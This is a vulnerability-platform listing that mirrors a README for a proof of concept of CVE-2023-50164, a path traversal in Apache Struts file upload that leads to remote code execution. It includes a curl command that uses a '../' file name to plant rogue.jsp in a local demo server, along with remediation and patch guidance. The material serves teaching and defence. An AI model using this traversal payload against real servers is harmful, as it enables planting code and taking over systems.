漏洞平台

POC详情： fe247bb033d6463f5a5567e1d6113b732df52e30

来源

https://github.com/snyk-labs/CVE-2023-50164-POC

关联漏洞

标题： Apache Struts 安全漏洞 (CVE-2023-50164)
描述：Apache Struts是美国阿帕奇（Apache）基金会的一个开源项目，是一套用于创建企业级Java Web应用的开源MVC框架，主要提供两个版本框架产品，Struts 1和Struts 2。 Apache Struts 存在安全漏洞，该漏洞源于file upload参数存在路径遍历漏洞。攻击者可利用该漏洞上传恶意文件并执行远程代码。受影响的产品和版本：Apache Struts 2.0.0至2.5.32版本，6.0.0至6.3.0.1版本。

介绍

This is a Proof of Concept (PoC) for [CVE-2023-50164](https://nvd.nist.gov/vuln/detail/CVE-2023-50164), which outlines a
new path traversal vulnerability which can lead to Remote Code Execution (RCE) in 
[struts-core](https://struts.apache.org/). 

To remediate the issue, it is advised that you update to Struts 2.5.33 or Struts 6.3.0.2 or greater.

This repo builds off the excellent work of
[Henrik Plate](https://github.com/henrikplate) found [here](https://github.com/henrikplate/struts-demo).

## Run the PoC

There are two maven profiles in this project: `vuln` and `no-vuln`. `vuln` is the default.

To run _with the RCE vuln_, execute the following:

```
mvn clean jetty:run -P vuln
```

To run _without the RCE vuln_, execute the following:

```
mvn clean jetty:run -P no-vuln
```

The difference between the two profiles is `vuln` uses `struts-core` version `6.3.0.1` 
(which has the path traversal vulnerability) and `no-vuln` uses `struts-core` version `6.3.0.2` 
(which does not have the path traversal vulnerability)

## Exploit the Vuln

while running the `vuln` profile described above, execute the following:

```
curl \
http://localhost:9999/struts-vuln-poc/upload.action \
-F "Upload=@./payload/rogue.jsp" \
-F "uploadFileName=../src/main/webapp/rogue.jsp"
```

You'll be able to see the file `rogue.jsp` in the `src/main/webapp` folder and you can browse to it at:
`http://localhost:9999/struts-vuln-poc/rogue.jsp` (you'll see a **Ya been PWNED!** message).

There is a code fix solution that works with the older Struts versions, _but_, it is still highly advised to update
your version of Struts.

To exercise the code fix, execute the following:

```
curl \
http://localhost:9999/struts-vuln-poc/upload-no-vuln.action \
-F "Upload=@./payload/rogue.jsp" \
-F "uploadFileName=../src/main/webapp/rogue.jsp"
```

You'll see an error message: `Attempted path traversal attack`

**NOTE**: If you use the `no-vuln` profile, you **won't** get an error message from the `/upload-no-vuln` 
endpoint, even if you use a relative path like: `../src/main/webapp/rogue.jsp`, as the new version of struts 
automatically strips away relative path references.

文件快照


 [4.0K]  /data/pocs/fe247bb033d6463f5a5567e1d6113b732df52e30
├── [ 11K]  LICENSE
├── [ 10K]  mvnw
├── [6.8K]  mvnw.cmd
├── [4.0K]  payload
│   └── [ 173]  rogue.jsp
├── [4.0K]  pom.xml
├── [2.1K]  README.md
├── [4.0K]  src
│   └── [4.0K]  main
│       ├── [4.0K]  java
│       │   └── [4.0K]  io
│       │       └── [4.0K]  snyk
│       │           └── [4.0K]  labs
│       │               └── [4.0K]  actions
│       │                   ├── [1.8K]  Upload.java
│       │                   └── [2.5K]  UploadNoVuln.java
│       ├── [4.0K]  resources
│       │   └── [1.2K]  struts.xml
│       └── [4.0K]  webapp
│           ├── [ 190]  index.html
│           └── [4.0K]  WEB-INF
│               ├── [ 579]  error.jsp
│               ├── [ 600]  success.jsp
│               ├── [ 570]  upload.jsp
│               └── [ 780]  web.xml
└── [4.0K]  uploads

12 directories, 14 files

神龙机器人已为您缓存

备注

1. 建议优先通过来源进行访问。

2. 如果因为来源失效或无法访问，请发送邮箱到 f.jinxu#gmail.com 索取本地快照（把 # 换成 @）。

3. 神龙已为您对POC代码进行快照，为了长期维护，请考虑为本地POC付费，感谢您的支持。